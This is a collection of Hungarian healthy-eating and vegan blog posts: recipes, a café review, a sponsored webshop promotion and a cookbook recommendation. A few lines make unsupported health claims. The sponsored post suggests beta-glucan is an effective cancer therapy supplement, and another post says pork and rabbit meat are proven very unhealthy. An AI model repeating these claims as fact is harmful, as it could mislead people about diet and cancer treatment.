2015. február 25. Éltető ételek
A gyerekek szeretik a pogácsát, gyakran kerül az uzsonnás dobozba. Többnyire sajtos, hajtogatott pogácsát készítek, most viszont újítottam. Tojás- és sajtmentes, nagyon finom pogácsa lett belőle. Hozzávalók (16 db lett belőle) - 20 dkg teljeskiőrlésű tönkölyliszt - 10 dkg fehér tönkölyliszt - 12,5 dkg bio vaj (a sparban szoktam venni, egy kockányi mennyiség) - 2 evőkanál főtt, tört burgonya - 1 dkg élesztő - pici méz - 1-2 evőkanál tejföl - 1 és egy pici mokkáskanál só - 3 dkg pirított, tört tökmag - 1 teáskanál szárított medvehagyma (tavasszal egy csokor friss) - 1 kis gerezd fokhagyma Elkészítése: A lisztet mérjük egy nagy edénybe, majd a közepére csináljunk egy kis mélyedést. Ebbe morzsoljuk az élesztőt, és csorgassunk bele egy picike mézet. Öntsünk rá egy kis meleg vizet. Takarjuk le egy piros konyharuhával, és tegyük félre úgy öt percre. Közben a tökmagot tegyük egy zacskóba, és húsgloffolóval törjük össze. Száraz serpenyőben egy picit pirítsuk meg. Ha éppen szerencsénk van, akkor van kimaradva ebédről egy kis főtt krumpli, ha nincs, akkor bizony főzni kell. Vegyük elő ismét az élesztős lisztet, és morzsoljuk bele a vajat. Adjuk hozzá a sót, a metélőhagymát, és a fokhagymát. Gyúrjuk bele a törtkrumplit is, és annyi tejfölt adjunk hozzá, hogy könnyen gyúrható, masszív tésztát kapjunk. Ja, a tökmag is kerüljön bele. Nyújtsuk ki, és ezután jön a hajtogatás, 3-szor. Alul-felül, majd két oldalt is hajtsuk fel. Tegyük félre, majd ismét...mint ahogy írtam, 3-szor. Negyedikként úgy ujjnyira nyújtsunk ki, majd vágjuk fel kockára. Tegyük a tepsibe, és itt is hagyjuk pihenni úgy fél órát. A sütőt melegítsük elő 18 fokra, és süssük meg úgy 30 per alatt. Jó étvágyat!
Póréhagyma krémleves pirított tökmaggal és tökmagolajjal
2015. február 17. Éltető ételek
Imádom a krémleveseket. Ebédre is laktató, és úgy főzök, hogy még vacsorára is jusson egy tányérkával. A póréhagyma igazi téli zöldség, most sok helyen lehet kapni. Érdemes kipróbálni. Hozzávalók (3-4 adag): - 1 nagy póréhagyma - 3 közepes burgonya - 2-3 gerezd fokhagyma - 1 közepes méretű sárgarépa - úgy 10-15 cm-es szárzeller - 1 kiskanál kókuszolaj - jó sok bors, só - pirított tökmag, pici tökmagolaj - kevéske tejszín Elkészítése: A zöldségeket tisztítsuk, majd daraboljuk. Nem lényeges, hogy milyen formára, hiszen pürésítve lesz minden. Egy edénybe tegyük bele a kókuszolajat, majd a zöldségeket. Folyamatosan táncoltassuk benne a zöldségeket, majd öntsünk rá vizet. Sózzuk, borsozzuk, majd főzzük lassú tűzön puhára. Elő a botmixer, majd löttyintsünk bele egy kevéske (növényi)tejszínt. Amikor kiszedtünk a tányérkákba, akkor szórjuk meg pirított tökmaggal, majd pici tökmagolajjal locsoljuk meg.
Reggelire fel! - Magyaros Tahini, azaz magyaros ízű szezámmag krém
Már egy jó ideje tervezem, hogy indítok egy REGGELIZŐS TOPIKot, mert rengeteg reggelinek is alkalmas egészséges recept ötletem van. :-) És ahogy azt a régi mondás is tartja a reggeli a nap legfontosabb étkezése! ;-) Mégis nagyon sokunknak problémát okoz reggelente változatos ételt tenni az asztalra. A legtöbbünk gyorsan bekap egy összedobott szendvicset, vagy ami még rosszabb, útközben beugrunk egy pékségbe, és veszünk magunkhoz egy jó nagy adag cukros szénhidrátot, amivel túléljük ebédig. Kevesen szánunk elég időt és figyelmet rá, hogy reggel is könnyen emészthető, tápanyagban gazdag, egészséges, és ami a legfontosabb, energiadús ételt fogyasszunk. Pedig alapvetően meghatározhatja a nap további alakulását, a frissességünket, a közérzetünket, a kedélyállapotunkat az étel minősége, amivel a gyomrunkat terheljük meg reggelente. ;-) Megpróbálok segíteni, és néhány receptötlettel ellátni téged, kedves Olvasóm! Remélem lesz olyan reggeli, ami a jövőben a mindennapi étkezésed részévé fog válni! ;-) Hát akkor kezdjük a napot emészthető, tápanyagban gazdag és energiadús reggelikkel! Reggelire fel! :-) emészthető, tápanyagban gazdag, és energiadús Reggelire fel! :-) Még mindig egyiptomi hangulatban égve, az első reggeli ajánlatom egy arab szendvicskrém lesz, hogy ne menjünk egyenlőre olyan távol a jól megszokott kenyeres reggelitől. ;-) Már egy jó ideje próbálom bevinni az étkezéseinkbe a szezámmagot, mert sok jó dolgot lehet olvasni róla. Íme egy ötlet, hogyan foszathatjuk rendszeresen az értékes szezámmagot. A tahini finomra őrölt szezámmagból készült sűrű állagú massza, melyet elsősorban keleti ételek alapanyagaként használnak. Alapanyagát már az egyiptomiak is ismerték, az ókori görögök nem csak élelmiszerként, de gyógyszerként is használták. Mivel a tahini egyetlen alkotóeleme a szezámmag, ezért tápanyag és vitamintartalma is hasonló, annyi különbséggel, hogy azok felszívódása sokkal hatékonyabb a magok megőrlése miatt.A szezámmag telis-teli van értékes tápanyagokkal: többek között fehérjével, antioxidánsokkal, rostokkal, B1-vitaminnal, E-vitaminnal, emellett olyan ásványi anyagokkal, mint a mangán, réz, vas, kalcium, cink, magnézium és kálium. A gazdag tápanyagtartalom ellenére néhány embernél a szezámmag (és így a tahini) fogyasztása allergiás reakciókat eredményezhet. Magas zsírtartalma miatt kalória tartalma is jelentős. magyaros tahini Valamelyik nap megkívántam a régi hagyományos magyaros vajkrém ízét. Ennek az íz kívánalomnak köszönhetően megszületett a magyaros tahini krém receptje. :-) Hagyományos, megszokott íz, nem megszokott alapanyaggal felhasználva, finom és tápláló reggeliző krémet eredményezett. Próbáljátok ki ti is! ;-) HOZZÁVALÓK: 150 g szezámmag (porrá darálva)1 közepes sárgarépa1 közepes piros színű pritamin paprika1 gerezd fokhagymafél fej lila hagyma1 ek útifű maghéj (Psylium Husk)2 ek piros paprika fűszer1 késhegynyi Cayenne paprika (vagy valami csípős)2 tk Himalája sófrissen őrölt fekete bors ízlés szerint1 ek mustár1 marék friss petrezselyem1 ek agave szirup / vagy jó minőségű mézkb. 2 dl víz (opcionálisan - 1 ek sörélesztő pehely a szendvics tetejére)(opcionálisan - 1 ek őrölt lenmag a krémbe, hogy növelje a tahini tápanyagtartalmát) magyaros tahini ELKÉSZÍTÉS: A száraz hozzá valókat egy tálban összekeverem: porrá darált (kávédarálóban) szezámmag, útifű maghéj, fűszerek, só, (sörélesztő). A turmix gépben pépessé dolgozom a répát, a paprikát, a mustárt, a petrezselymet, a mézet, a vizet, a lila hagymát és a fokhagymát. Miután ez egy egynemű joghurt állagú krémmé alakult (ha kell, még adok hozzá vizet), összekeverem a száraz hozzávalókkal. Az egészet egynemű krémmé kavarom, és mehet is be a hűtőbe. Kb. 1 óra múlva már boldogan és ízletesen fogyasztható, sok sok zöldség társaságában, egy teljes kiörlésű kenyér tetején. (Akár házi sütésű, és még meleg is lehet). ;-) friss zöldségek házi teljeskiőrlésű sokmagos kenyér Megjegyzés1: Nem hiszem, hogy ez a legfinomabb kenyérre való pástétom (szerintem a padlizsánkrém sokkal finomabb), de az biztos, hogy rettentően egészséges, és hiányt pótló recept a konyhámban. A szezámtól és a piros paprikától egy kissé kesernyés lett az ízhatás, de kenyéren, jó sok zöldséggel (pl.: retek, zöld levelek, kendermag, póréhagyma és paradicsom) észre sem lehet venni. ;-) Egyébként is azt olvastam valahol, hogy az az egészséges, ha mindenféle ízből fogyasztunk rendszeresen, így a keserű és a savanyú íz se maradjon ki az életünkből. :-) Megjegyzés2: Hűtőben tárolva, fedett tárolóban, akár 1 hétig is fogyasztható.
Zöldségtan
A magyarországi könyvkiadás hosszú időn át fütyült a hazai Hugh Fearnley-Whittingstall-rajongók jogos igényeire. A River Cottage-szériák már sokadik ismétlésüket érték meg a különféle televíziós csatornákon, a Jamie Oliver-, Gordon Ramsay-, sőt a Heston Blumenthal-könyvek is szép rendben sorakoztak a boltokban, mire megtört a jég.
Kókusztejszínes dhal
Az idetévedő laikus egyed most úgy érezheti magát, mint az a 7 éves kiskölök, aki a karácsonyfa alatt megleli a Nintendós dobozt, majd amikor kibontja, akkor szembesül vele, hogy a vicces kedvű szülők abba gyömöszölték bele a rénszarvasos szvettert. Tudniillik, ha nagyon leegyszerűsítjük a dolgot, a szóban forgó étel népies neve: LENCSEFŐZELÉK. Szó se róla, nagyon távolról rokonságot ápol azzal a borzembrióból és sakálnyálból erjesztett barna rettenettel, melyet az óvodai vérdadus próbált meg letuszkolni a torkunkon. Sőt, ha objektíven nézzük, köze nincs hozzá. Mint a tradicionális magyar főzelékek esküdt ellensége, bátran mondhatom, hogy ennél finomabb ételhez (és ez globálisan, sőt, két tejútrendszer között értendő) csak igen ritkán volt szerencsém. Alkatrészek: 25 dkg vöröslencse 1 fej vöröshagyma 3 gerezd fokhagyma 1 kiskanál őrölt gyömbér vagy 1 cm-es lereszelt gyömbérgyökér 2 kiskanál őrölt kömény 2 kiskanál garam masala 1 kiskanál mustármag 1 kiskanál kurkuma 1 kiskanál görögszéna 1 kiskanál őrölt chili 1 kiskanál őrölt korriander 3 dl kókusztejszín vagy sűrű kókusztej (pl. ez a fajta különösen javallott) 400 g konzervparadicsom 1 citrom leve só A vöröshagymát felkockázzuk és a belenyomott fokhagyma társaságában olajon megdinszteljük. Hozzáadjuk a gyömbért, a köményt és a mustármagot, és jó két percig együtt pároljuk jó két percig. Egy kevés víz után belepasszítjuk a garam masalát, a görögszénát, a kurkumát, a koriandert és a chilit. Ezt a vegyületet pár percig kevergetjük, majd belelöttyintjük a kókusztejszínt, a konzervparadicsomot és 1 dl vizet. Mivel egy marék rajzszeg hamarabb puhul meg, mint a vöröslencse, így gyakori kevergetés mellett kb. 15-20 percig főzzük. Legvégül hozzáadjuk a citromlevet és a sót, majd álmélkodva szervezetünkbe juttatjuk.
Teszt: Naspolya Nassolda
2015. január 16. Zizi kalandjai
Naspolya Nassolda, hallottatok már róluk? Végre decemberben megnyílt a nyers nasizó! Egyszerű, letisztult, talán kicsit skandinávos dizájn fogad bennünket. A fehér szín van kombinálva natúr fa elemekkel, egy kis szürkével és sárgával. Nekem nagyon tetszik. De lássuk a nasikat, amelyek nyersek, tej-, tojás- és gluténmentesek, ráadásul az alapanyagok egy része bio minősítésű; amit lehet azt a Csörsz utcai biopiacon szerzik be magyar termelőktől (pl. szezonális gyümölcsök: alma, körte). Minden nyers – ami azt jelenti, hogy 42 fok a legmagasabb, amellyel alapanyagot hőkezelnek – a tortáktól kezdve, a kekszekig, krékerekig, müzli szeletekig és datolya golyókig. Igyekszenek követni a szezonalitást, most éppen sütőtökös, almás nyers tortáik vannak, amelyeken kívül valami extra is megtalálható mindig a pultban. Mi kettőt teszteltünk a tonkababos csokoládétortát és a mákos citromtortát – mindkettő kiállta a próbát. Nem hagytuk ki friss pörkölésű (bio, fair trade) kávéjukat sem, amelyet saját készítésű mandulatejjel (és kókuszcukorral) kínálnak. A karobos, narancsos és tonkababos datolya golyók pedig Ádi tetszését is elnyerték. Nem volt elég három darab, repetázott belőlük. A Naspolya Nassolda árakat tekintve magasabb árkategóriát képvisel, de vegyük figyelembe, hogy a bio és a nyers desszertek előállításához szükséges alapanyagok (pl. datolya, kesudió, mandula, stb.) nem olcsóak, viszont itt bármit nassolunk, azzal jót teszünk a szervezetünknek. Alkalomadtán pedig egy kis kényeztetés belefér. Nem beszélve arról, hogy az ilyen helyekkel zárkózunk fel Nyugat-Európához és Észak-Amerikához, ahol már régóta virágkorát éli a nyers, vegetáriánus, vegán étkezés a vendéglátásban! Naspolya Nassolda 1061 Budapest Káldy Gyula u. 7. Weboldal Facebook
Ugyanitt használt vágódeszka ingyen elvihető...
A Férj gasztobloggernek képzelte magát, a szobát meg elterítették a disznóságok. Jelentem Ő vásárolt, nyiszatolt, maszatolt, mártogatott , fotózott, mosogatott!, és pakolt el, még a deszkát is alaposan elsúrolta, de nem maradhat... Borzasztó lelkesedéssel indult neki a projektnek, és várta a hatást, meg a véleményeket. Említettem neki, hogy megjegyzések olyanok itt, mint a fehér holló, erre nagyon csalódott lett, de a látogatási statisztika alakulásával elégedett. Igen, a hülyeség mindig kelendő, valószínűleg az előző bejegyzés és a szalonnacukra rekordokat fog dönteni. Bezzeg a hajdinás sütim! Azt ugye nem nézi csak néhány elvetemült hasonszőrű, meg gluténérzékeny. De legalább libasonka lett volna... Azt, hogy vegetáriánus az ember, könnyebben megértik az emberek, mintha szelektíven bizonyos húsokat nem eszik meg, és még csak nem is zsidó származású. Viszont hasonló okokból nem fogyasztunk pl. disznó, nyúl, egyéb húsokat. Amik mára kiderültek, hogy valóban nagyon egészségtelenek. Így a jelige az, hogy be se kerüljön a házba! Másrészt büdös is, nem csak ártalmas a fogyasztása, és idegesít. A mélyen tisztelt főszakács úr sem táplálkozik ilyenekkel, bár húsevő, csak most megengedte magának ezt a gyagyaságot. :) Egyébként aranyos volt, ahogy nagy lendülettel tett-vett. Mint a kis majdnemkétévesünk, mikor a vonatait tologatja szenvedélyesen, és közben magyaráz. Azért visszásak az érzelmek bennem, az első hozzávalónál felberzenkedtek az idegeim. Másrészt viszont oly sok fotós projektjében részt vettem, és olykor nagyon élveztem az egész menetét, és büszke voltam az eredményre, ezért valahol ezt is megértem. Ez az oka, hogy teret kapott, és vendégposztként szerepelhet. A többi véleményemet meg majd egyszer leírom, amikor már megint rá se néz a blogra. :)
Diósült, a tökéletes húsmentes fasírt
2014. december 20. Zöld Avocado
A következő recept akár a karácsonyi menüben is szerepelhetne. Nálunk biztosan fő étel lesz! ;-) A nevével ellentétben semmi köze egy diós desszerthez. Tökéletes húspótló! :-) Ha nem mondjuk meg a vendégünknek, hogy mit eszik, biztosan az lesz az első tippje, hogy valamilyen fasírozottat. Az íze és állaga is teljesen ugyanolyan, mint egy sertéshúsból készült tepsis fasírt, vagy akár egy stefánia vagdalt. Gyerekkoromból emlékszem a nagymamám tepsiben sült fasírozottjának pontosan ugyanilyen íze volt. ;-) Diósült, párolt zöldségekkel, sült édes burgonyával Ez miért más? Mert egyáltalán nem állati fehérjéből, azaz húsból készül, és mégis biztosítja a szükséges fehérje mennyiséget, és a zsír bevitelt (Omega3). Mert telis tele van tápláló hozzávalókkal, vitaminokkal (pl.: E-vitamin, folsav), hasznos ásványi anyagokkal (pl.: kálium, kalcium, vas, magnézium, cink stb.), antioxidánsokkal, könnyű megemészteni, energiát ad, és mennyei ízzel ajándékoznak meg a puha meleg diósült szeletek. Készítsétek el, és próbáljátok ki, kinek milyen élményt nyújt a nevére egyáltalán nem hasonlító étel remek, ami akár egy gasztro alkotás is lehetne a gasztro művészetek múzeumában, ha létezne olyan! :-D Természetesen nem én vagyok a nagy ,,művész, aki megalkotta a dió sültet. Az eredeti receptet Bede Anna Vegasztrománia című szakácskönyvében láttam meg először. Ezt egy kicsit a saját ízlésünkre formáltam, és ez a felejthetetlen élmény lett belőle. (Ezt mások mondták, nem én. ;-) ) HOZZÁVALÓK: - 200 g dió - 50 g szezámmag, kesudió, mogyoró (ezek keveréke, vagy ami éppen otthon van) - 1 nagy lila hagyma - 1 marék friss petrezselyem - 400 g konzerv hámozott paradicsom - 150 g ementáli sajt reszelve - 2 tojás (vagy 2 ek őrölt lenmag 6 ek vízzel kocsonyásra keverve) - 1 ek mustár - Himalája só, frissen őrölt fekete bors, pirospaprika, egy csipet Cayenne bors vagy erős pista - 3 gerezd fokhagyma - 2 db közepes sárgarépa - (1 ek útifűmaghéj) - (2 ek sörélesztő pehely) Diósült, avagy a tökéletes húsmentes fasírt sült édes burgonya ELKÉSZÍTÉS: A diót és a magvakat egy serpenyőben zsiradék nélkül lepirítjuk, hogy a zamatok jobban érezhetőek legyenek. Miután lepirult, félre tesszük őket hűlni, majd a darálóban durvára aprítjuk. A lila hagymát és a fokhagymát egy kevés vízzel krémessé turmixoljuk. A sárgarépákat a hámozott paradicsommal (konzerv lé nélkül) a turmixban péppé dolgozzuk. A darált dió és mag keverékhez hozzáadjuk a hagymapépet, a sárgarépás paradicsomot, a fűszereket (só, bors, petrezselyem, mustár, Cayanne bors), a tojásokat, és a reszelt sajtot. Az egészet összekeverjük, hogy egy nagyjából egynemű fasírt állagot kapjunk. (Ha van otthon útifűmaghéj és sörélesztő, az is most kerüljön bele.) diósült, tortaformában sütve Elővesszünk egy sütőformát (én rendszerint a kerek tortaformámban készítem el ezt a sültet). Kikenjük kókuszzsírral, vagy béleljük sütőpapírral. 180 °C -ra előmelegített sütőben kb.45 perc alatt piros ropogósra sütjük a diós fasírtunkat. Párolt zöldségkörettel és édes burgonyával, vagy friss zöldséggel tálalva vehetjük le a lábukról vacsora vendégeinket. :-) Diósült, párolt zöldségekkel és sült édes burgonyával Kellemes karácsonyi készülődést, meghitt, szeretetben gazdag, jóízű, egészséges karácsonyi vacsorát kívánok mindenkinek! :-) Megjegyzés: érdemes utána olvasni a neten mi mindenre jó a dió?! Rengeteg jótékony hatása van, és nem is tudjuk mekkora kincs, hogy Magyarországon könnyedén hozzájuthatunk. Tapasztalatból mondhatom, hogy a legtöbb országban ritkaságszámba megy, és ahogy szokták mondani ,,aranyárban mérik. A legnagyobb kiszerelés pl.: itt Írországban egy 200 g-os kis műanyag dobozka. :-(
Biosziget - egészségesen élek
2014. december 15. Mindennapi ételeink
A Biosziget Webáruház Kft. jóvoltából egy karácsonyi csomagot válogathattam össze, melyet ma kézhez is kaptunk. Azért örültem ennek a lehetőségnek, mert szeretem ezt a céget: megbízhatóak, korrektek, gyorsak. És talán ami a legfontosabb: rendkívül széles termékkínálattal rendelkeznek, és mindezt megfizethető áron (alternatívákat kínálva a vásárlók számára, így mindenki eldöntheti, mennyit szán bizonyos termékekre). És persze, karácsony előtt szeretteinkre gondoltunk a rendelésnél. Hiszen nincsen jobb, mint egészséges, különleges ajándékokkal meglepni egymást. A jól struktúrált honlapon az alábbi termékcsoportok közül válogathatunk: Egészségügyi panaszok (pl. stressz, alvászavar, epe, máj, ízület, csont stb.),Gyógymódok, gyógynövények, Terápiák, kúrák, Baba-mama, Gyerekeknek, Élelmiszerek, Kutyáknak-macskáknak, Készülékek, Ajándékötletek, Teák, Sportolóknak, Könyvek, Ajándékötletek, Szépségápolás. Folyamatosan akciókkal várják a megrendelőket. Vitaminok közül most éppen a béta-glükán kapható olcsóbban, amit mi téli időszakban minden nap fogyasztunk, rendkívül jó hatással van az immunrendszerre. Rákos betegeknek ajánlják, bizonyos kísérletek nyomán kiderült, hogy nagy dózisban rendkívül hatásos terápiás kiegészítés lehet. Továbbá akciós az Arm&Hammer szódabikarbóna. Ezt többször említem a blogon, és többen kérdezték is magánlevélben, miért jó ez. Én süteményekbe használom szódabikarbóna helyett; sokáig nem lehetett Magyarországon beszerezni, most sem egyszerű és olcsó. Most rendkívül sok bio kozmetikum került leárazásra (pl. Bentley bio kozmetikumok), de pl. búzafű és gyümölcspréshez is 15.000 Ft alatt hozzájuthatunk, ez remek karácsonyi ajándék lehet bárki számára. Ami számomra a legnagyobb öröm volt, hogy Laica vízszűrő kancsó két betéttel rendkívül kedvező, így ezt már az ajándékcsomagon kívül gyorsan meg is rendelem - magunknak. Bárhova megyük, Fanninkkal, nem kell aggódnunk a víz minősége miatt. Szóval, aki még nem vásárolt be (ahogy én sem), annak jó keresgélést és rendelést kívánok ezen a honlapon is!
Paradicsomos ratatouille
2014. december 8. Vegán muflon
Szemelvény személyes értelmező kéziszótáramból: Húsevő (főnév): Gyűjtőnév, ezen csoportba tartoznak a ragadozó állatok, valamint azon személyek, akik a kőszáli kecséket is hajlamosak a következő kérdéssel traktálni: "És halat sem eszel?" Továbbá ők azok, akik a főtt növényeket tartalmazó ételkülönlegességeket kivétel nélkül a "lecsó" fedőnéven emlegetik. Hát, ezúttal legyen igazatok, gyalázatos mopszhóhérok! Lecsó következik, ám még véletlenül sem az a fajta, melyet a nagy sztereotípiák könyve szerint kackiás bajszú magyar kondások főznek bográcsban. Hanem az a variáció, melyet kackiás bajszú francia kondások főznek bográcsban. A ratatouille, tradicionális nevén lecseaux hozzávalói: 1 db Lvöröshagyma 2 gerezd Lfoghagyma 1 db Lpadlizsán 1 db Lcukkini 2 db Lkaliforniai paprika (eltérő színű, hogy szép is legyen) 3 db Lparadicsom 2 dl Lsürített paradicsom 2 kiskanál Loregánó 1 kiskanál Lbazsalikom 1 kiskanál Lkakukkfű 2 db Lbabérlevél Lsó Lbors A felkockázott vöröshagymát olajban megfonnyasztjuk, majd belenyomjuk a fokhagymát. Hozzáadjuk a felkockázott zöldségeket, sózzuk, borsozzuk. Ez voltaképpen a ratatuille natúr változata, rövid párolás után már így is tökéletes végeredményt kapnánk. Node, ez kiábrándítóan snassz lenne, ezért hozzáadjuk a sűrített paradicsomot és a fűszereket. Ne főzzük túl, akkor tuti, ha még sercegnek a zöldségek szájunk pitvarában.
Reform Aranygaluska és kistestvére, "Ezüstgaluska"
2014. december 4. Zöld Avocado
Bár a kelt tészták egyáltalán nem tartoznak az egészséges ételek közé, én jó magyar módra nem tudok teljesen lemondani róluk. :-) Az egyik ilyen nagy kedvenc az iskolai menzát idéző aranygaluska. Még nem találkoztam olyan emberrel, aki nem szeretné a sodóban úszó diós kis gombócokat. :-) Reform aranygaluska és ezüst kistestvére Természetesen ennek is el lehet készíteni, egy kevésbé hízlaló, emészthetőbb, gyomorbarát verzióját, mely fehér cukor, fehér liszt és laktóz mentes. Így is elég magas a kalória tartalma, de nálunk nem az (el)fogyás a szempont, hanem az emészthetőség. Így pedig megállja a helyét néha napján az itthoni menüben! ;-) A teljes kiőrlésű lisztekben a gabona korpája is megtalálható, amely tápanyagokban gazdag és segíti az emésztést. A teljes kiőrlésű gabonákból készült termékek amellett, hogy sok hasznos élelmi rostot, vitamint és ásványi anyagot (E-vitamin, B-vitamin, kálium, kalcium, magnézium, foszfor) tartalmaznak, segítenek megelőzni a rák, a cukorbetegség és a szívbetegségek kialakulását is. Reform "ezüstgaluska" HOZZÁVALÓK: (kb. 2 személyre 2 étkezésre) a tésztához: - 175 g teljes kiőrlésű tönköly liszt - 75 g rizs-, vagy mandula-, vagy lenmagliszt - 25 g porcukor (nyírfacukorból, vagy nádcukorból készítsük el a porcukrot a kávédarálónkban) - 25 g jó minőségű növényi alapú margarin (ha szeretnénk tartani a laktóz mentességet) - 1 tasak por élesztő (instant és kb.20 g) - csapott tk. szódabikarbóna - 1/2 tk Himalája só - 1 db egész tojás - 120 ml növényi tej (mandula tejjel a legjobb) - 1 db kezeletlen citrom reszelt héja a diós ,,panírhoz: - 130 g frissen darált dió (Ne vegyünk agyoncukrozott valódi diót nem látott noname dió ízű keverékeket!) - 40 g nyírfacukor vagy nádcukor - kb. 1/2 bögrényi olvasztott növényi margarin vagy kókusz zsír - (a mákoshoz a dió helyett mákot használjunk) Reform aranygaluska a sodóhoz: (Sokféle receptet kipróbáltam már, de nekünk ez ízlett a legjobban!) - 1/2 liter növényi tej (mandulatejjel vagy mogyoró tejjel a legjobb) - 2 tojás sárgája - 50 g nyírfacukor vagy Nádcukor - 2 ek liszt sűrítéshez (ez lehet pl.: rizsliszt) - 1/4 rúd vanília vagy 1 ek vanília extract/kivonat - 1 dkg növényi margarin ELKÉSZÍTÉS: A tésztához való száraz összetevőket mérjük ki és tegyük egy keverő tálba. Egy másik kisebb keverőtálban keverjük/habarjuk össze a folyékony összetevőket egyneműre (a margarint én megszoktam olvasztani előtte). Majd öntsük hozzá a száraz részhez, és gyúrjunk belőle kelt tészta alapanyagot. Akkor jó, ha nem túl kemény, még ragad, de nem ragad teljesen a kezünkre. Egy lágyabb, még növekedni képes tésztát kellene kapnunk. Használjunk még lisztet, vagy tejet, annak függvényében, hogy a tésztánk milyen állagot vett fel ?! Tegyük a tésztát meleg helyre kelni 1 órára. Ha nem süt a nap, vagy nem megy éppen a fűtőtest a lakásban, akkor érdemes a sütőbe tenni. DE ne süssük meg a nyers tésztát! Csak kelesszük. Hogy hogyan? Melegítsük elő a sütőt 50 fokra, majd kapcsoljuk le. Ezután tegyük be a tésztánkat a keverőtálban a sütőbe, és takarjuk le egy tiszta konyharuhával. Sütő ajtót becsukni, de nem bekapcsolni a sütőt! 1 óra alatt szépen megkel a tésztánk. Persze mivel teljes kiőrlésű lisztből készül, ezért ne várjuk ugyanazt a hatást, mint egy fehér lisztes kelt tésztánál. Puha, és ruganyós lesz, de nem fog túl magasra megkelni. Sebaj, a könnyebb emészthetőség oltárán beáldozhatjuk a térfogat növekedést, és a puhaságot. ;-) A ,,panírozáshoz keverjük össze a frissen darált diót az édesítőszerünkkel, és egy külön kis müzlis tálban olvasszuk meg a zsiradékot (növényi vaj vagy kókuszzsír). Miután a tésztánk már 1 órát melegedett a sütőben, kivesszük, és kinyújtjuk kb. 2 cm vastagságúra. Ehhez használjuk a már jól ismert ,,2 sütőpapír között nyújtunk trükköt, és akkor nem ragad semmi sehová, és könnyebb mosogatni is utána. :-) A kinyújtott tésztánkból nagyobb pogácsa szaggatóval félholdformákat szaggatunk. Ezeket a holdacskákat megfürdetjük az olvasztott zsiradékban, majd meghempergetjük az édesített dióban, és egy sütőpapírral bélelt magas falú tepsibe, vagy tortaformába pakoljuk őket, szorosan egymás mellé. Miután megtelt a forma, elfogyott a tészta, letakarjuk, és újabb fél órát kelesztjük a nyers aranygaluskákat. Ekkor már nem szükséges a sütőt előmelegíteni, elég, ha csak egy nem hideg helyen pihentetjük őket. Eltelt az újabb fél óra. A sütőt közben előmelegítettük 170 °C fokra. Betesszük a galuskákat, és 30-35 perc alatt légkeveréses programon készre, aranybarnára sütjük. Közben elkészítjük a sodót hozzá. A tojás sárgáját 1 dl növényi tejjel, az édesítőszerrel és a liszttel csomómentesre elkeverjük. A maradék növényi tejet a vaníliával felforraljuk, és forrón hozzáöntjük a tojássárgás keverékhez. Tűzre tesszük az egészet, és folytonos keverés mellett addig főzzük, míg sűrűsödni nem kezd. Forrni nem szabad neki, mert a tojássárgája összecsomósodik benne. (Ez esetben turmixoljuk össze kézi bot mixerrel a sodót.) Ha a tűzről levesszük, beletesszük a kevés kis növényi margarint, és fényesre keverjük. Nem lesz ez a sodó olyan sűrű mártás, mint a hagyományos menzai, mert a növényi tej nem tud úgy behártyásodni, mint az állati eredetű tej. De az íz élmény felülmúlhatatlan marad! ;-) Reform aranygaluska és ezüst kistestvére (nyersen) Előfordul, hogy nem marad elég diós ,,panír. Ilyenkor sem kell kétségbe esni! Ekkor kerül elő a szekrényből a mák, és készül el az aranygaluska kistestvére, vagy mondhatnám a kínai utángyártott verzió, az ,,ezüstgaluska! :-D A mákot és az édesítőt összekeverjük (ha szeretnénk a mákot meg is darálhatjuk, de egészben is fogyasztható.) És ebben a fekete ,,panírban forgatjuk meg a vajas galuskákat. A többi minden ugyanaz, mint a diós változatban. Ugyanúgy készül el, és ugyanúgy fogyaszthatjuk a sodóval. Szerintem ez is nagyon finom! ;-) Általában két adag tésztát készítek, és az egyik fele diós, a másik fele mákos lesz. Egyik nap aranygaluskát eszünk, a második nap már csak ezüstöt. :-D reform aranygaluska és kistestvére "ezüstgaluska" Megjegyzés1: Valahol olvastam egy ötletes megoldást, hogyan lehet felhasználni az ilyen jellegű tésztákból megmaradt tojásfehérjéket?! Kb. 3 db fehérjéhez keverjünk hozzá 3 ek. búzadarát, 3 ek. reszelt sajtot, sót, borsot, és muffin formában süssük ki a ropogós sajt roppancsokat. Jól hangzik, bár ki még nem próbáltam, mert nálunk általában elfogy a következő napi rántottában a megmarad tojás fehérje. ;-) Megjegyzés2: A mákos galuskához el tudok képzelni a sodó helyett egy gyorsan elkészíthető házi lekvárt. Pl.: Nagyon fekete szőlőt leturmixolunk 1 ek útifűmaghéjjal, és beleteszünk 1 ek darált chia magot. Az egészet betesszük a hűtőbe egy éjszakára, és kész is a cukor mentes, villámgyors, házi lekvár.
Könyvajánló: Adorján Éva Egészséges finomságok
Szívből ajánljuk! Nemcsak Karácsonyra! Adorján Évi Egészséges finomságok c. könyve hiánypótló a magyar nyelvű, nyers vegán édes receptkönyvek piacán. A gyönyörű képek mellett különleges ízkompozíciókat ismerhetünk meg, végtelenül praktikus és világos receptleírásokkal. Ha még most ismerkedsz a nyers vegán desszertekkel, vagy már van tapasztalatod, akkor is találhatsz benne rengeteg újdonságot! Az alapoktól kezd a könyve, majd a könnyű krémes desszertektől, az útravaló édességeken át, eljut a piték, torták, parfék világába. A könyvet webshopunkban itt találod meg! ...hőkezelés nélkül, tej-, tojás- és gluténmentesen Stressz, energiahiány, letörtség, alvásproblémák, depresszió - ki ne tapasztalta volna néhanapján saját bőrén ezeket a tüneteket? És ki ne szeretne kiegyensúlyozottan, harmóniában élni önmagával és környezetével? Ki ne vágyna arra, hogy az elhízás veszélye nélkül ehessen igazán jókat, hogy ne kelljen órákat a konyhában töltenie, vagy a teljes havi fizetését elköltenie a bioboltban? Adorján Éva könyve nemcsak magyarázatot ad arra, hogyan és miért esszük magunkat fáradtra és enerváltra, hanem segít felfedezni a teljes értékű étkezés izgalmas világát is. Olyan recepteket gyűjt össze, melyek alapján egyszerűen, gyorsan és egészségesen készíthetjük el a legédesebb finomságokat - cukor, tej és tojás nélkül. Sőt, sütés nélkül.
Nyers Vegán Karácsonyi kínálat
